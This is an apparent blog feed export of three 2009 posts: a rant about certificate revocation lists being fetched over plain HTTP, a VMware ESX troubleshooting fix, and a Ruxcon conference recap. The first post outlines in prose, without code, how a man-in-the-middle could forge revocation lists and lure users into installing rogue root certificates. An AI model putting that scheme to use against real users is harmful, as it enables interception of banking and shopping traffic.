Storeyhttp://www.blogger.com/profile/10406049887224934659noreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-69160279849838329032009-09-02T10:39:00.005+10:002009-09-03T00:58:32.748+10:00Revocation, just rolls off the toungeFirst an overview, SSL is pretty much the only protection available when banking, shopping etc. It means the user has to look for the https:// up the top rather than the http:// to ensure the session from their browser to the websites server is encrypted in transit (this isn't perfect people can fake some certificates, and security researchers are trying to find its holes all the time). Don't trust the lock or the little green bar that EV certs give you as these can be faked several ways, generally though the https and certificate information can be trusted. Also look at an extension for FireFox called SSL blacklist for FireFox that will notify you if a certificate is bad due to one of many reasons.<br />One of the interesting things about certificates is of course they have to be able to be revoked, when for some reason they become compromised or some such other reason.<br />CRL or certificate revocation lists as some are probably aware are basically a list stored on the company that provided the certificates website, basically a list of all the certs that have been revoked. Excellent idea, but look at most certificates details and CRL is hosted on a good ole plain http site eg; http://crl.thawte.com/ThawteSGCCA.crl<br />YAY, so if you want just own a few crl via DNS poisoning or man in the middle (MITM) a user (can we say web cafe) and serve up a fake crafted CRL to revoke heaps of certificates or just remove your revoked cert for their bank etc. Of course there are a lot of variables here, you need to know the CRL that is going to be requested though if you have MITM'd them you can just serve all of them up, they are usually signed, but not always, you also need to know sites they are going to go to, but you can dynamically do this as well.<br />Their digital signing doesn't look that good from what I have seen from reading the crl's either, but they are supposed to sign it with their SSL certificate available from their site via a link, so no trust their just sign it with your own cert and serve that up at their site as you are already in the middle.<br />But the nice thing as far as a denial goes is that most operating systems cache this info (for 24 hours usually), and the Certificate hierarchy is good just blacklist the vendors root certificate.<br />To do any real damage you still need to get a certificate registered that has been falsely registered, or do a bit of social engineering, blacklist all certs and pop up a page saying the user needs to update their certificates, redirect them to a legit looking site that asks them to install a certificate package full of your own generated root certificates, all SSL sites from then on are readable as you re-sign them with your key on the way through.<br />Of course SSL isn't a fix for the revocation lists as no one will see that it requests the list from https instead of http, I have even seen some installs of Internet Explorer that have certificate revocation checking turned off, I am not sure if this is default, but bad none-the-less.<br /><br />Well I hope this long winded odd rant is at least made some people think. It is a very odd setup and I am surprised all CRL's don't require possibly multiple signing by at least two vendors kind of like nuclear launch codes.Morgan Storeyhttp://www.blogger.com/profile/10406049887224934659noreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-28142293295336832662009-06-24T19:36:00.002+10:002009-06-25T08:57:13.585+10:00Vmware issuesNot so much a dedicated security issue (though Availability is in the CIA triangle that should be drummed into everyone by now), but something I thought I would blog about as I found it no where else.<br />I was having an interesting issue with a guest on one of the ESX clusters I manage, looking at the ESX host, none of its other guests were having issues. The guest in questions came up as disconnected, not powered on. But I could RDP to it.<br />I logged into the host and checked esxtop and noticed the Guest was in the list.<br />Checking the tasks of the Guest in the Vmware client I noticed its VCB backup last night died, and that the error I was getting on the guest was Unable to communicate with host, since it is disconnected, I got this same message when trying to power on the guest.I quickly checked the vmware.log and dmesg on the ESX host that was hosting the guest, nothing obvious, googling around gave me no answers. It was then I noticed the last entry in the vmware.log was early this morning, to do with CD rom errors. I thought it could be a simle management disconnect, so I ran<br /><br />/etc/init.d/mgmt-vmware restart<br />The whole ESX server disconnected from the VMware client as you expect, then it came backup, the problem host came backup too, no downtime, no mess. Ran a quick manual backup and all done.Morgan Storeyhttp://www.blogger.com/profile/10406049887224934659noreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-53175052663579591252009-01-02T18:15:00.002+11:002009-06-24T20:24:23.421+10:00Ruxcon belated Day2So this is really a belated day2, been fairly busy at work. We had an embargo for changes over December, but that didn't mean we didn't do work, we had less people on so we did more.<br /> I am going to put a bit more in that the initial recap I did of day 1, first the recap of Day2.<br /> Day 2 was well and truly on par with Day 1, the Ruxcon guys put on an awesome con, and I had a great time.<br /> To recap on day two I went first to an excellent talk by Ben Mosse entitled Browser Rider, next on to a promising tool that was presented I thought somewhat appethetically called Intelligent Webfuzzing by Neil and Bern Archibald. Then onto the BBQ lunch where I had a chat with one of my security mentors the venerable <a href="http://marty.sunriseroad.net/">Martin Visser</a> (he knows his wireshark fu).<br /> Then after lunch I went to one of the highlight talks of the con, Netscreen of the Dead by Graeme Neilson (that I recently heard talked about on the pauldotcom security weekly podcast). Then onto the smaller room2 for Googless by Christian Heinrich a fairly good talk but I think aimed more at those not up on their google fu and scripting.<br /> Then finally onto a very interesting talk by Adam Daniel called Pimpin: Forensic Style.<br /><br />NOTE the talks slides (not videos yet) are available <a href="http://www.ruxcon.org.au/2008-archive.shtml">here</a><br /><br />I was going to talk about the day in more depth, but that has been whats has delayed this. I will post my notes one day.Morgannoreply@blogger.com0